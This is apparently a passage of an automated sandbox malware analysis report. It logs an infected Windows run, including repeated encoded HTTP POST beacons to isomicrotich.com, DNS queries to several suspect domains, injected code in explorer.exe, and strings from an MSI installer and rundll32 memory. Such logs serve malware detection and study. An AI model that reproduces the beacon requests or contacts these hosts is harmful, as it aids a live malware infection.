Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_00F25078 InternetReadFile,

9_2_00F25078

Source: global traffic	DNS traffic detected: DNS query: tiguanin.com
Source: global traffic	DNS traffic detected: DNS query: bazarunet.com
Source: global traffic	DNS traffic detected: DNS query: greshunka.com
Source: global traffic	DNS traffic detected: DNS query: isomicrotich.com

Source: unknown

HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache

Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/R
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/m
Source: rundll32.exe, 00000006.00000003.3310057236.0000016AD0E3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3319992865.0000016AD0E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3290625753.0000016AD0E04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3291075436.0000016AD0E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3290462373.0000016AD0DDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3290113304.0000016AD0E31000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownloa
Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownloa--
Source: rundll32.exe, 00000006.00000002.3805248446.0000016AD0D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2824000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000006.00000003.3320122038.0000016AD2D08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6f303f824f2cb
Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6f303f824f
Source: explorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 00000009.00000000.1792501391.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1792522161.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3809613463.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000000.1791266554.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529699566.0000016AD28C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 